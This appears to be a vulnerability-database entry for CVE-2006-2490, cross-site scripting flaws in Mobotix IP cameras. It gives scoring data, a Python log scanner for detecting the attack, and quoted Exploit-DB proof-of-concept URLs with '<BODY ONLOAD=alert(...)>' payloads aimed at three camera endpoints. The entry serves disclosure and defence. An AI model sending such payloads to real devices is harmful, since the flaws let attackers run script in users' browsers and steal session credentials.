CVE-2006-2490
Published 2006-05-19
Priority: P4 19 · medium · 4.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.88% (85.1th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Mobotix IP Network Cameras M1 1.9.4.7 and M10 2.0.5.2, and other versions before 2.2.3.18 for M10/D10 and 3.0.3.31 for M22, allow remote attackers to inject arbitrary web script or HTML via URL-encoded values in (1) the query string to help/help, (2) the get_image_info_abspath parameter to control/eventplayer, and (3) the source_ip parameter to events.tar.
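The three injection points named above can be monitored in web server or reverse-proxy logs. The following Python script is an added example, not part of the CVE record or any vendor tooling: it flags requests to those endpoints whose watched field decodes to HTML markup. It assumes combined-format access logs, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint -> parameter named in the CVE text (None = the whole query string).
WATCHED = {
    "/help/help": None,
    "/control/eventplayer": "get_image_info_abspath",
    "/control/events.tar": "source_ip",
}
MARKUP = re.compile(r"[<>\"']")  # characters that allow HTML/script injection
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # assumed combined log format

def fully_decode(value, rounds=3):
    """Normalise repeated percent-encoding before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def check_request(target):
    """Return (path, field) when a watched field carries markup, else None."""
    parts = urlsplit(target)
    if parts.path not in WATCHED:
        return None
    param = WATCHED[parts.path]
    if param is None:
        fields = [("query string", parts.query)]
    else:
        fields = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k == param]
    for name, value in fields:
        if MARKUP.search(fully_decode(value)):
            return (parts.path, name)
    return None

def scan(lines):
    """Return (line number, path, field) for every flagged request line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        hit = check_request(match.group(1)) if match else None
        if hit:
            hits.append((number, *hit))
    return hits

# Constructed sample log lines (documentation addresses), not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [17/May/2006:10:00:01 +0000] "GET /control/events.tar?source_ip=192.0.2.55&download=egal HTTP/1.1" 200 512
198.51.100.7 - - [17/May/2006:10:02:13 +0000] "GET /control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal HTTP/1.1" 200 734
198.51.100.7 - - [17/May/2006:10:02:40 +0000] "GET /help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E HTTP/1.1" 200 901
198.51.100.7 - - [17/May/2006:10:03:05 +0000] "GET /control/eventplayer?get_image_info_abspath=%253Cb%253E HTTP/1.1" 200 300
""".splitlines()
```

Calling `scan(SAMPLE_LOG)` reports lines 2, 3 and 4; line 1 carries an ordinary address in `source_ip` and is not flagged.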
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
| mobotix | mobotix_ip_network_camera | — | — |
Exploit-DB
Mobotix IP Camera M1 1.9.4.7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting
exploitdb·2006-05-17
---
source: https://www.securityfocus.com/bid/18022/info
The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal
Exploit-DB
Mobotix IP Camera M1 1.9.4.7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting
exploitdb·2006-05-17
---
source: https://www.securityfocus.com/bid/18022/info
http://www.example.com/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
Exploit-DB
Mobotix IP Camera M1 1.9.4.7/M10 2.0.5.2 - help Script Cross-Site Scripting
exploitdb·2006-05-17
---
source: https://www.securityfocus.com/bid/18022/info
http://www.example.com/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
http://secunia.com/advisories/20151
http://securityreason.com/securityalert/929
http://securitytracker.com/id?1016128
http://www.attrition.org/pipermail/vim/2006-August/000980.html
http://www.eazel.es/media/advisory001.html
http://www.osvdb.org/25621
http://www.osvdb.org/25622
http://www.osvdb.org/25623
http://www.securityfocus.com/archive/1/434289/100/0/threaded
http://www.securityfocus.com/archive/1/444018/100/0/threaded
http://www.securityfocus.com/bid/18022
http://www.vupen.com/english/advisories/2006/1857
https://exchange.xforce.ibmcloud.com/vulnerabilities/26538